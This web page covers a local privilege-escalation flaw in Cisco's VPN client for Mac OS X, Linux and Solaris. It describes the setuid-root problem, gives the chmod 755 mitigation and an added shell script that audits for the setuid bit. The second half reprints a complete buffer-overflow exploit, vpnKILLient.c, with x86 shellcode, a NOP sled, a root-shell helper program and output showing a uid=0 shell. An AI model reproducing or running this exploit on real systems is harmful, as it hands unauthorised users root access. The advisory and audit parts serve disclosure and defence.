Cisco VPN Client For Mac OS X can be exploited locally
About Cisco VPN Client:
The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network.
Information:
Cisco's VPN Client for Mac OS X, Linux and Solaris contains a security vulnerability which can be exploited locally to obtain administrative privileges. The Virtual Private Network (VPN) client allows non-Windows platforms to function over a VPN network. Windows users need not worry about this particular security advisory.
A local user could exploit the Cisco UNIX VPN client software, if it is installed on the computer, by executing arbitrary code that grants administrative privileges. If the user has not altered the setuid permissions, vpnclient will give administrative privileges, allowing the user to modify any part of the system without authorization.
Fix/Update
The vpnclient vulnerability may be mitigated by altering the permissions of the binary using the chmod command, which removes the setuid bit from it. In the Terminal window, as an administrative or root account, execute the following command:
/bin/chmod 755 /usr/local/bin/vpnclient
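An added check for this mitigation (example shell script written for this page, not from the advisory or from Cisco): it tests whether the vpnclient binary is installed setuid root, the configuration the advisory describes, applies the chmod 755 fix, and verifies the bit is gone. The binary path defaults to the one given above; the names VPN_CLIENT, is_setuid, is_setuid_root, remediate, list_setuid_root and audit_vpnclient are chosen here.

```shell
#!/bin/sh
# Added example, not from the advisory or from Cisco: audit the setuid bit
# the advisory says to remove, apply its chmod 755 fix, and verify.
# Assumes a POSIX sh with find(1) and `test -u`; VPN_CLIENT defaults to the
# path given in the advisory and can be overridden in the environment.
VPN_CLIENT="${VPN_CLIENT:-/usr/local/bin/vpnclient}"

# 0 if FILE is a regular file with the setuid bit set (mode 4xxx), else 1.
is_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# 0 only if FILE is setuid AND owned by root: the combination that lets
# a local user run code as uid 0 through the vulnerable binary.
is_setuid_root() {
    is_setuid "$1" || return 1
    # find(1) instead of parsing ls output; prints the path only when
    # the owner is root.
    [ -n "$(find "$1" -user root -print 2>/dev/null)" ]
}

# The advisory's mitigation: mode 755 clears setuid and setgid.
# Returns 0 only when the bit is verified gone afterwards.
remediate() {
    chmod 755 "$1" && ! is_setuid "$1"
}

# Audit helper: every setuid-root regular file under DIR (default: the
# directory the advisory's vpnclient lives in).
list_setuid_root() {
    find "${1:-/usr/local/bin}" -type f -perm -4000 -user root -print 2>/dev/null
}

# Exit status: 0 = not setuid root, 1 = vulnerable configuration,
# 2 = binary not present.
audit_vpnclient() {
    if [ ! -e "$VPN_CLIENT" ]; then
        echo "not installed: $VPN_CLIENT"
        return 2
    elif is_setuid_root "$VPN_CLIENT"; then
        echo "VULNERABLE: $VPN_CLIENT is setuid root; fix: chmod 755 $VPN_CLIENT"
        return 1
    fi
    echo "ok: $VPN_CLIENT is not setuid root"
    return 0
}
```

Source the file and call audit_vpnclient, or list_setuid_root /usr/local/bin for the whole directory; the exit status is what a configuration scanner would key on.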
The vulnerability has been fixed in version 3.5.2, which should be made downloadable by Cisco shortly via their website. Go to the Cisco Software Distribution Center at Cisco's Web Page to download the new version of the UNIX VPN client.
Exploit/Code for Cisco VPN Client for Linux/Mac OS X
The code from AngryPacket Security, vpnKILLient.c, is listed below as an example of how the exploit is executed.
/* buffer overflow for
cisco's vpnclient for linux
tested against the latest release:
vpnclient-linux-3.5.1.Rel-k9.tar.gz
to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)
#include <stdio.h>
#include <unistd.h>
int main(void) {
    setuid(0);
    execl("/bin/sh", "sh", NULL);
    return 0;
}
then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;
when you get a chance, check out http://sec.angrypacket.com
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi, malloc */
#include <string.h>
#include <strings.h>  /* bzero */
#include <unistd.h>
#define NOP 0x90
#define LEN 620 /* 520 to own eip */
/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";
/* returns the current stack pointer; relies on eax being the x86 return register */
unsigned long get_sp (void) {
    __asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {
    int i, offset=0;
    long addr;
    char *buf, *ptr;
    if(argc > 1) offset = atoi(argv[1]);
    buf = (char *)malloc(sizeof(char) * LEN);
    bzero(buf, LEN);
    addr = get_sp() - offset;
    printf("addr: 0x%lx, offset: %d\n", addr, offset);
    /* fill the whole buffer with the guessed address */
    for(i = 0; i < LEN; i += 4) {
        *(long *)&buf[i] = addr;
    }
    /* first half becomes NOPs */
    for(i = 0; i < (LEN / 2); i++) {
        *(buf + i) = NOP;
    }
    /* shellcode goes in the middle of the buffer */
    ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
    for(i = 0; i < strlen(shell); i++) {
        *(ptr++) = shell[i];
    }
    buf[LEN - 1] = '\0';
    /* passed as the "connect" argument of the setuid vpnclient binary */
    execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, (char *)NULL);
    return(0);
}
More details can be obtained by visiting the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client.
Feedback Time:
Special thanks goes out to Jess K. Frykholm for making us aware of this security issue!